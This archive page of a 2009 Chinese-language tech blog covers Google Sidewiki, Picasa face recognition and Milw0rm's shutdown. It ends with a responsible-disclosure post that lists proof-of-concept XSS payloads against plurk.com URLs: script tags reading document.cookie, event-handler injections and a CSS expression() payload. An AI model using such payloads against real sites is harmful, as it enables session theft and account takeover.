2009/09/24

Google Sidewiki

Google 再出招!

Help and learn from others as you browse the web: Google Sidewiki
http://googleblog.blogspot.com/2009/09/help-and-learn-from-others-as-you.html

可以直接在這邊下載
http://www.google.com/sidewiki/

這真的是太邪惡的功能了...
每個人不用在自己的地方引用來評論一個網頁,而是可以直接用 Google Sidewiki 直接討論。
而且在觀看網頁的時候直接顯示...

唯一的缺點是一定要安裝 Toolbar 才能使用。
假如能夠更方便的使用一定能夠成為殺手級應用...

張貼者: allenown 位於 3:49:00 PM 0 意見 此文章的連結

2009/09/23

Picasa 3.5 人臉辨識!

http://picasa.google.com/support/bin/answer.py?hl=en&answer=93773

中文版目前應該無法直接下載,可以用這個 Link
http://dl.google.com/picasa/picasa35-setup.exe

People albums

之前就一直很期待 Google 把 PicasaWeb 上的人臉辨識這個功能轉移到 Desktop 版,如同之前的預測,3.5 版也做進 Desktop 了。而且人臉資訊還是跟同步的,使用者也可以自己加上聯絡資訊電話mail等等。

滿滿的個人資料。:P

這樣對使用者來說分類照片跟找照片就真的是太方便了!
不用再一張一張找了...
推廣一下 :P

標籤: , , ,

張貼者: allenown 位於 1:28:00 PM 0 意見 此文章的連結

2009/07/09

Goodbye, Milw0rm.

今天從 timhsu 長輩那邊知道 Milw0rm 要 Goodbye 了。




Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke


我想或許多多少少是一些地方的壓力造成的?少了這樣一個好地方真的滿可惜的,有的時候有一個即時更新新東西的集散地是相當有幫助的。相當感謝 str0ke 這些年來的維護...

不過這下主機們應該可以安靜一小段時間?XD
一些習慣去那邊抓 exploit 下來打的大概都要多花一些時間挖寶了...XD

抓個圖來紀念一下這時候的榮景...



---

Update 20090710:

http://www.milw0rm.com/

又復活了!XD
之前復站期間還因為一海票人一直掛著 mirror 又馬上被搞下去...

總之,可喜可賀!

---

Update 20091104:

http://bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html

這次是站長過世了...:(

標籤: , , ,

張貼者: allenown 位於 12:26:00 AM 3 意見 此文章的連結

2009/07/08

Plurk 一些漏洞揭露 (2)

這兩天聽了 SySCAN,發現有志一同的發現了一樣的 css expression 問題。
真的滿有意思的!XDD

expression 的問題跟站長溝通過,filter 的過程真的是不太嚴謹。老早之前回報過的沒想到竟然只是過濾固定字串而已...Orz
儘管只是 IE only 的攻擊,但我想 < IE8 的使用者還是不在少數。這一點實在是不能忽略。

CSRF 目前建議了幾個方案給站長,Amir 說目前由於 API 的問題他們必須要做很大的修改。我想這多半是因為一開始設計的時候沒有考量到這些問題的緣故。這樣要改下去我想要花費不少的心力,真的是辛苦他們了!

目前建議 A-Team 要防堵 Worm 的攻擊,我想最簡單最初階的方法就是將散佈的手段防堵住,或者讓傳播的途徑更為複雜。將 Profile / 發訊息 / 回應訊息的地方限制住我想是個相當不錯的方法。:)

Plurk 在台灣使用者數量真的是越來越多,最近加好友跟粉絲的數量越來越多,暴增的使用者我想安全性對於使用者來說越來越來得重要。

希望 A-Team 多加油啊!

標籤: , , ,

張貼者: allenown 位於 6:44:00 PM 2 意見 此文章的連結

2009/06/28

Plurk 一些漏洞揭露

紀念今天拿到 Karma 100,來把 Plurk 已經修復的漏洞講一下。
跟站長幾個月前就溝通來往好久了,不記錄一下自己都快忘記了。
就目前手上有記錄的幾個貼上來記錄一下...



還沒修補的幾個就留著等 A-Team 修補完畢囉!

XSS
http://www.plurk.com/m/ 幾乎都有 XSS 問題http://www.plurk.com/Notifications/?page=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.plurk.com/Users/confirmEmail?user=%3Cscript%3Ealert(/x/)%3b%3C/script%3E&key=x&email=z

http://www.plurk.com/m/s/?query=a%22%3E%3Cimg%20src=%22aaa%22%20onerror=%22javascript:alert('a')%3b%22%3E%3C%22

與訊息有關皆有onmouseover:  http://allenown.blogspot.com/"onmouseover="alert('XD');" ( http://allenown.blogspot.com )

Custom CSS:  body{ background-url: ex/**/pression(alert(document.cookie)); }

還有一些 CSRF 因為還需要修正就先不記錄了。
等跟站長們討論過後再來更新這篇。:D

很感謝 Plurk 團隊 A-Team 一直願意修補這些問題,在 Plurk Birthday Party 上 Alvin 也說很感謝我們沒有先在網路上揭露這些問題,並且拿來進行攻擊。
希望 Plurk 能夠越來越完美。:)

標籤: , , , ,

張貼者: allenown 位於 9:52:00 PM 0 意見 此文章的連結

Subscribe to: Posts (Atom)

Profile Card